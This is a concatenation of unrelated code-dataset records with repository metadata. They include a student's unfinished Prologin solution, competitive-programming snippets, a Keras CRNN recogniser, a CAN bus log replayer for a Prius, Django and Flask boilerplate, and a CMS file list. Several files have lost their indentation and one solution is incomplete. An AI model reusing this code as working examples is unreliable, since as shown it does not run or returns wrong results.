5aa4013e18747fac74f0b474293fbfca4050e3d6 | 9da129ec93a6fd2c5f65b57a0faec21d8eb80720 | /Term_NSI/devoirs/4-dm2/Corrigé/S0/Non finis/E13-Plan_de_mtro.py | 526fa706fe6287af13575f935f94756983389b78 | [] | no_license | FranckCHAMBON/ClasseVirtuelle | 79bd4e4114d27ca3792b46b1fb384c394397b329 | 48fe9883ee6763e79e561537bc0ed7048339b457 | refs/heads/master | 2022-08-22T15:35:48.128508 | 2021-04-28T07:21:04 | 2021-04-28T07:21:04 | 249,953,475 | 3 | 4 | null | 2022-08-05T09:28:10 | 2020-03-25T10:52:47 | HTML | UTF-8 | Python | false | false | 889 | py | """
Nom: PALAZON
Prénom: Anabel
Prologin: Qualification 2003
Exercice: 13 - Plan de métro
https://prologin.org/train/2003/semifinal/plan_de_metro
"""
def nb_intermédiaires (liste : list, nb_couples : int) -> int :
    """Return the number of intermediate stations one has to pass through
    to reach the station furthest from the start.

    NOTE(review): implementation is unfinished — only the trivial
    single-edge case is handled; every other input falls through and
    implicitly returns None. The original docstring's doctest was also
    malformed (expected value 7 with no call line), so it is omitted
    here until the traversal is actually implemented.
    """
    if nb_couples == 1 :
        return 1
# Entrée
départ = int(input())
nb_couples_stations = int(input())
# BUG FIX: the original `assert 1 <= départ, nb_couples_stations <= 1000`
# only checked départ's lower bound (everything after the comma was the
# assert *message*); check both bounds for both values.
assert 1 <= départ <= 1000 and 1 <= nb_couples_stations <= 1000
# BUG FIX: the original line was a syntax error
# (`map(int, input().split) for in range (...)`); read one [a, b] pair
# per input line. Names match the call to nb_intermédiaires below.
nb_couples = nb_couples_stations
liste = [list(map(int, input().split())) for _ in range(nb_couples_stations)]
# Sortie
print(nb_intermédiaires(liste, nb_couples)) | [
"franck.chambon@ac-aix-marseille.fr"
] | franck.chambon@ac-aix-marseille.fr |
9885653186d1619aaa626651335b51322f938b13 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02754/s775628525.py | c08aa17fa27593932f995ed4aa58535828193f96 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | if __name__ == '__main__':
n,a,b = map(int,input().split())
tmp1 = (n // (a + b)) * a
if tmp1 == 0:
tmp2 = min(n,a)
else:
tmp2 = n % (a + b)
tmp2 = min(a,tmp2)
print(tmp1+tmp2) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d73c2ea372d3745e6aed21a8328f59db0670ed9c | dad6951dd4e0696f9f9c54a815438806fa0b2798 | /recognition/network.py | 093c19a713cefd4bd595afe59ab3b9f58fde991e | [
"MIT"
] | permissive | Bobo-y/number_detection_recognition | 29a95ae9889e12469eeeecdcf337c2d375a6ccf1 | e135ab9a71d13fd3fa2d7946bc665b4c24b2e384 | refs/heads/master | 2023-04-14T01:32:26.804644 | 2023-04-07T07:27:39 | 2023-04-07T07:27:39 | 206,984,887 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,888 | py | from keras import backend as ktf
from keras.layers import Conv2D, LSTM, Lambda, BatchNormalization, MaxPooling2D, Reshape, Dense, Dropout, add, concatenate, Bidirectional
from keras.models import Model, Input
from keras.optimizers import SGD
class CRNN:
    def __init__(self, width, height, label_len, characters):
        """Store the CRNN configuration.

        width/height: input image dimensions; label_len: maximum label
        length fed to the CTC loss; characters: the recognisable
        alphabet — its length becomes the softmax class count.
        """
        self.height = height
        self.width = width
        self.label_len = label_len
        self.characters = characters
        self.label_classes = len(self.characters)
    def ctc_loss(self, args):
        """Unpack (y_pred, labels, input_length, label_length) and return
        the per-sample CTC batch cost from the Keras backend.
        """
        iy_pred, ilabels, iinput_length, ilabel_length = args
        # the 2 is critical here since the first couple outputs of the RNN
        # tend to be garbage:
        iy_pred = iy_pred[:, 2:, :] # no such influence
        return ktf.ctc_batch_cost(ilabels, iy_pred, iinput_length, ilabel_length)
def network(self):
input_im = Input(shape=(self.width, self.height, 3))
conv_1 = Conv2D(64, (3, 3), activation='relu', padding='same')(input_im)
bn1 = BatchNormalization()(conv_1)
conv_2_1 = Conv2D(128, (3, 3), activation='relu', padding='same')(bn1)
conv_2_2 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv_2_1)
bn2 = BatchNormalization()(conv_2_2)
pool_1 = MaxPooling2D(pool_size=(2, 2))(bn2)
conv_3_1 = Conv2D(256, (3, 3), activation='relu', padding='same')(pool_1)
conv_3_2 = Conv2D(512, (3, 3), activation='relu', padding='same')(conv_3_1)
bn3 = BatchNormalization()(conv_3_2)
pool_2 = MaxPooling2D(pool_size=(2, 2))(bn3)
conv_4_1 = Conv2D(512, (3, 3), activation='relu', padding='same')(pool_2)
conv_4_2 = Conv2D(512, (3, 3), activation='relu', padding='same')(conv_4_1)
bn4 = BatchNormalization()(conv_4_2)
bn_shape = bn4.get_shape()
x_reshape = Reshape(target_shape=(int(bn_shape[1]), int(bn_shape[2] * bn_shape[3])))(bn4)
fc_1 = Dense(128, activation='relu')(x_reshape)
rnn_1 = LSTM(128, kernel_initializer="he_normal", return_sequences=True)(fc_1)
rnn_1b = LSTM(128, kernel_initializer="he_normal", go_backwards=True, return_sequences=True)(fc_1)
rnn1_merged = add([rnn_1, rnn_1b])
# bi_lstm1 = Bidirectional(LSTM(128, kernel_initializer="he_normal", return_sequences=True), merge_mode='sum')(fc_1)
#
rnn_2 = LSTM(128, kernel_initializer="he_normal", return_sequences=True)(rnn1_merged)
rnn_2b = LSTM(128, kernel_initializer="he_normal", go_backwards=True, return_sequences=True)(rnn1_merged)
rnn2_merged = concatenate([rnn_2, rnn_2b])
# bi_lstm2 = Bidirectional(LSTM(128, kernel_initializer="he_normal", return_sequences=True), merge_mode='concat')(bi_lstm1)
drop_1 = Dropout(0.25)(rnn2_merged)
# drop_1 = Dropout(0.25)(bi_lstm2)
fc_2 = Dense(self.label_classes, kernel_initializer='he_normal', activation='softmax')(drop_1)
infer_model = Model(inputs=input_im, outputs=fc_2)
labels = Input(name='the_labels', shape=[self.label_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(self.ctc_loss, output_shape=(1,), name='ctc')([fc_2, labels, input_length,
label_length])
train_model = Model(inputs=[input_im, labels, input_length, label_length], outputs=[loss_out])
sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5)
train_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=sgd)
infer_model.summary()
train_model.summary()
return train_model, infer_model
if __name__ == '__main__':
import string
CRNN(200, 31, 11, '0123456789'+'-').network()
| [
"yl305237731@gmail.com"
] | yl305237731@gmail.com |
33b4d90c4efa471773177d7d5852f84c30010563 | 2c84413f27983ef4a70d8bacb8f75347e29279b5 | /common/simulation.py | 3a801b78ce96a59a8519d1d24eb09c90c8f2948a | [] | no_license | KUASWoodyLIN/SmartCar | 0ff2fe94d871fbcc028f0e7bce975ad00115e9bf | 06f429f3980d4abea6fb4fb7e77f2a7b371a8206 | refs/heads/master | 2020-03-18T10:21:40.208636 | 2018-05-29T18:22:09 | 2018-05-29T18:22:09 | 134,608,273 | 1 | 1 | null | 2018-05-28T03:59:46 | 2018-05-23T18:08:23 | Python | UTF-8 | Python | false | false | 1,827 | py | import os
import struct
import time
from pandas.io.parsers import read_csv
from canbus import Prius
ROOT_PATH = os.path.expanduser('~')
DATA_PATH = os.path.join(ROOT_PATH, 'picture/car_logger')
canfile2 = os.path.join(DATA_PATH, 'canbus_output2.csv')
output = os.path.join(DATA_PATH, "combine2file.csv")
class Prius_sim(Prius):
def __init__(self):
super(Prius_sim, self).__init__()
def send_data(self, can_send):
self.panda.can_send_many(can_send)
def main():
sim = Prius_sim()
df = read_csv(canfile2)
can_data = df.values
sys_start_time = time.time()
can_start_time = can_data[0][0]
can_pre_time = can_data[0][0]
first_time = True
for data in can_data:
can_now_time = data[0]
addr = int(data[2], 16)
msg = data[3].split('x')[-1]
msg = [struct.pack('B', int(msg[i:i + 2], 16)) for i in xrange(0, len(msg), 2)]
msg = "".join(msg)
sim.send_data([[addr, 0, msg, 0]])
# print "can {}".format(can_now_time - can_pre_time)
# print "sys {}".format((time.time() - sys_pre_time))
# print can_now_time - can_pre_time - (time.time() - sys_pre_time)
if first_time:
time.sleep(can_now_time - can_pre_time)
first_time = False
else:
can_time = can_now_time - can_pre_time
delay_time = can_time - time.time() + sys_pre_time
if delay_time > 0:
time.sleep(delay_time)
else:
can_now_time = can_now_time - delay_time + 15.100e-05
sys_pre_time = time.time()
can_pre_time = can_now_time
print "System running time\t{}".format(time.time()-sys_start_time)
print "CAN messing running time\t{}".format(can_now_time-can_start_time)
if __name__ == '__main__':
main() | [
"jj7158761@gmail.com"
] | jj7158761@gmail.com |
dec0b68ae796dfec7127aa46ccb149a4eb6b64b6 | aca5fb05db7b7199456ecaecf402990925afd61b | /takenote/manage.py | 2173da3f84949a5de4eaa6224da1dfdfb62b2b42 | [
"Apache-2.0"
] | permissive | macerocket/takenote | c9573943353f76e569661197c845787a5a5276a2 | df02c41e44a9c2f4a0505d1de0ed732a59dda173 | refs/heads/main | 2023-06-19T15:28:42.617999 | 2021-07-20T12:54:56 | 2021-07-20T12:54:56 | 386,726,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'takenote.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"macerocket@yahoo.com"
] | macerocket@yahoo.com |
24a6b0edca4aea76ed2df92a4506e69f18716c16 | 05e102fb6c9232db2fb8ce5712b87b6552c4d32b | /src/mcp/main/routes.py | ecd9940615e974ce0c4c748644e29d2029d5efc7 | [] | no_license | iceph03nix/MCP-Server | a06c51779aa23b789d4c72abcc286e8463d810cf | c835a371b9abba3f9da92a696131e18f86c7eb8a | refs/heads/master | 2023-02-18T12:31:58.165193 | 2021-01-15T05:14:28 | 2021-01-15T05:14:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 555 | py | from flask import render_template, request, redirect, url_for, Blueprint
from flask_user import login_required, roles_required
main = Blueprint('main', __name__, template_folder='templates')
@main.route("/")
@main.route("/home")
def home():
return render_template('home.html', title='Home')
@main.route("/about")
def about():
return render_template('about.html', title='About')
@main.route("/admin")
@login_required
@roles_required('admin')
def admin_dashboard():
return render_template('admin_dashboard.html', title="Admin Dashboard")
| [
"iceman81292@gmail.com"
] | iceman81292@gmail.com |
94607147cb6a428256583d99cca352c265328f80 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02595/s086135640.py | 10579db5c1e5ef2a5300d80b183a84bc3668641d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | n,d = map(int,input().split())
cnt = 0
md = d**2
for _ in range(n):
a,b = map(int,input().split())
if md >= (a**2+b**2):
cnt += 1
print(cnt)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
33a55487e1f510c987844e49089fa57129182715 | 2fc8d3f1905fc02c474a877bd3144d609715ca85 | /genvslist.py | 6494946bb9b30bf2b76d9b3466861392b1f3d7da | [] | no_license | pandeymanish0786/python | 76e2426dced42b80a770af36436728cf08006846 | 169daf90f1088eb52ad499b54ee7ded3b6d86c70 | refs/heads/master | 2020-03-30T05:20:28.646150 | 2018-09-28T21:00:33 | 2018-09-28T21:00:33 | 150,793,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import sys
list_comp=sys.getsizeof([x*10 for x in range(1000)])
gen_exp=sys.getsizeof([x*10 for x in range(1000)])
print("to do the same thing,it takes.... ")
print(f"list comprehension {list_comp} bytes")
print(f"generator_expression {gen_exp} bytes")
| [
"noreply@github.com"
] | pandeymanish0786.noreply@github.com |
53071b95353ce7f83146f46c794afe3f096b1c04 | 0c24fcbf802ed1881abdfbf14b867d4545237602 | /students/y2331/practical_works/Levashova_Nastya/lesson_11022020/manage.py | d3c09516236e700cf375a68a1c77f5c803017ed2 | [] | no_license | TonikX/ITMO_FSPO_Web_Django_2020 | d435d2984778d668f6d04c86d78c991b3f390c1a | 267141d6e4ee231ca689c8929f3db25fef15a5fd | refs/heads/master | 2023-01-18T17:38:05.964240 | 2020-11-20T18:08:57 | 2020-11-20T18:08:57 | 245,081,715 | 2 | 139 | null | 2023-04-25T18:54:50 | 2020-03-05T05:59:54 | Python | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'lesson_11022020.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"62665598+tommmatojuice@users.noreply.github.com"
] | 62665598+tommmatojuice@users.noreply.github.com |
750932c0feb10216e230c989379fd3b764a5f998 | 477a636abfcd7e097fbf3dfe23626fe01693f1d5 | /dist/bin/unidoc-utf16 | 6325dd3bf6571665fe074f9f3c99c1fe472ba1f8 | [
"MIT"
] | permissive | shinkou/unicnv | 61e1c232ff3221b80f8e07b2372c6146b4e018d1 | befe476245e2587e352298834c5b9c0749ae188b | refs/heads/master | 2022-04-13T22:46:03.880250 | 2020-04-10T04:29:35 | 2020-04-10T04:29:35 | 254,544,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | #!/usr/bin/env python
# vim: fenc=utf-8 ff=unix ft=python lcs=tab\:>. list noet sw=4 ts=4 tw=0
from unicnv.unidoc_utf16 import main
if '__main__' == __name__:
main()
| [
"chunkwong.wong@gmail.com"
] | chunkwong.wong@gmail.com | |
183f7b8c55dcea8984a0f890ca6d83b8360ce420 | 993ef8924418866f932396a58e3ad0c2a940ddd3 | /Production/python/Summer20UL17/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8_cff.py | 19be89904fdebd86931dd97d867f4863815778f5 | [] | no_license | TreeMaker/TreeMaker | 48d81f6c95a17828dbb599d29c15137cd6ef009a | 15dd7fe9e9e6f97d9e52614c900c27d200a6c45f | refs/heads/Run2_UL | 2023-07-07T15:04:56.672709 | 2023-07-03T16:43:17 | 2023-07-03T16:43:17 | 29,192,343 | 16 | 92 | null | 2023-07-03T16:43:28 | 2015-01-13T13:59:30 | Python | UTF-8 | Python | false | false | 27,922 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0130ADED-8944-C644-A802-94AFC869D180.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/02A675E2-0B98-1E47-BEF2-87AE267B3872.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/05947A84-468D-0A4B-824F-F909985C25A2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0EB832E6-CFDA-1F4F-831E-80EF025519F4.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0F0728C6-805B-FE44-B8FA-8B6187AFEF8E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/0F3CD983-9A34-484F-933F-3C21DC6C9E9D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1021FA02-DD5C-FE4A-9829-79C55F702D5B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1050621F-A8FA-9E4E-8EB3-5F00EE52E5E1.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1145C4B6-FBEE-AE44-A882-B83E9F95EECF.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/131DFA05-56CF-2941-8003-661F79235C14.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1334FCA4-B8BC-8947-AA50-C254B3A4CE5C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/13CC0632-BB4F-8243-9A01-49F8EF020833.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/16E97FF6-09B6-AD4E-97BE-5B0FA146C3C0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/172A350A-7746-374B-95F7-6504F93336E6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1D6AC295-4F43-F14C-B55D-86F6FC83B962.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1D891B47-4DA9-1C46-B491-82044BD05D26.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/1F10683A-0032-1044-8E8C-3892254F215A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/20C72032-4DC2-0B4E-AFFA-8F12A44E3060.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/290937DC-867D-3143-A8A4-917F6D31E53B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/2EB5DE9B-B61C-8F4B-B295-B0F235019434.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/31C75064-B139-4E4F-B592-732566F66DAA.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/33FA51CA-1F64-104D-B5DD-AEBF47F612F3.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/34E98EFE-AA61-8142-9152-247888299ED0.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/35DA2631-3BB1-FC4E-8A2A-AE7B2E4E5476.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/37425CC5-CBE9-464E-96E9-5C06D4F7CA44.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/38BAC4EF-B549-124E-ADE1-BBF142C9C1B2.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3DAF4FC3-9097-0542-9A41-19B6C85EC65C.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3E833A9C-A5D7-044C-82CE-7835A22FAD5F.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/3F6BF9EE-2AB9-B748-B54B-DD1A016D89DD.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/45F68B41-93BC-7040-9CB0-D39E52AC2144.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4A717FB3-FB8C-7349-A536-8B2D43A5CEC9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B14CF1A-A022-3643-9FDB-20EE9FC6EED9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B6744E7-2A4F-624E-B577-9B59FA360FA9.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4B692BBD-CAB4-314F-93DF-F3B656F8129A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/4BA885FD-17E1-D54A-9D02-655EAD670F28.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/54739C76-024C-8F4C-9F2F-4CD073BE5896.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/56AA3A5D-6B5C-D54C-8B70-24A99BD4C0D8.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57918A90-9481-8D47-B47D-DE329B3D5889.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57D0B089-45FA-5840-9826-5C500B55C896.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/57DE6F33-6427-0F4A-BB04-41ACEBB2170B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5A73A109-2336-A54C-8C92-AC4FE5C46949.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5B887B67-FEE6-3347-A798-779B15B1B03E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/5BDC6A67-F02D-AA4B-827A-2080F4804209.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/64131FFA-2DC6-C247-B8BA-5EB3285B660A.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/662A4882-EDD2-0A49-96F5-DF010A222784.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/66402955-6310-7944-A363-2ACFD06BB460.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/66FDCBF5-79B2-284F-BB67-AD47A7FDC86B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/68B17790-E335-C746-9E29-C8A3497FBC02.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/68DD74DB-F918-624A-99FA-9C651991F84B.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6A5535C4-5F5B-164B-B616-48487984C880.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6A7E4CEB-260F-8B4B-9393-8B9467E7E60D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6BAE3043-3D74-E641-B6D7-3A6248297045.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/6E59C4F4-4388-EA43-8337-DD7A7F421AAD.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/749AB99A-5BBF-1F45-8D69-4524E98187C6.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/74F9CCA6-49D7-464A-A276-323339BCCD0E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/75FB00E3-AC8A-4B4D-B234-07AE0193BB6E.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/78E2CB0E-556C-3B48-B210-CEDBA0647D61.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/79646C05-8327-3948-8387-B747CBCF674D.root',
'/store/mc/RunIISummer20UL17MiniAODv2/TTGamma_Hadronic_TuneCP5_13TeV-madgraph-pythia8/MINIAODSIM/106X_mc2017_realistic_v9-v1/270000/7AE660E0-C428-AA46-B65B-23CFB6F6F172.root',
